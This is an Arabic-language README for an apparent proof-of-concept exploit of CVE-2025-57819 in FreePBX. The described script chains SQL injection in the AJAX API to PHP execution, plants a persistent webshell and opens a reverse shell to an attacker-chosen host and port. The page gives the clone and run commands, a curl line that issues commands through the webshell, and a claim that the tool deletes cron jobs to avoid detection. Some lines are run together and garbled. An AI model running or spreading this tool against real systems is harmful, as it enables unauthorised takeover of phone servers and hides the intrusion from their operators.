
استغلال إثبات المفهوم لثغرة CVE-2025-57819 في FreePBX: حقن SQL في واجهة AJAX API لتنفيذ كود PHP تعسفي، وإنشاء قشرة ويب (webshell) دائمة، وتشغيل قشرة عكسية (reverse shell).
يستغل هذا السكربت ثغرة أمنية في إصدارات FreePBX الأقدم من 16.0.26.0 (CVE-2025-57819)، مما يسمح للمهاجمين عن بُعد بتنفيذ كود PHP عشوائي عبر خلل في حقن SQL في نقطة نهاية AJAX API. يقوم هذا الاستغلال بإنشاء كل من قشرة ويب وقشرة عكسية تُفعَّل تلقائيًا.
/admin/ajax.php)/pbxshell.phprequestsgit clone https://github.com/jasonbernier/CVE-2025-5781.git
cd CVE-2025-5781
pip install requests
python3 exploit.py -H TARGET_HOST -lhost LHOST -lport LPORT
-H HOST: مثيل FreePBX الهدف (مثل: https://freepbx.example.com)-lhost LHOST: عنوان IP الخاص بك لاستقبال القشرة العكسية-lport LPORT: المنفذ المستخدم لاتصال القشرة العكسيةpython3 exploit.py -H https://target.freepbx.com -lhost 10.0.0.1 -lport 4444
بعد نجاح الاستغلال، يمكن الوصول إلى قشرة الويب عبر:
curl -X GET "http://TARGET/pbxshell.php?cmd=id"
يقوم الاستغلال تلقائيًا بإزالة مهام cron بعد التنفيذ لتجنب اكتشافه.
-- لتعليق باقي صيغة SQL/var/www/html/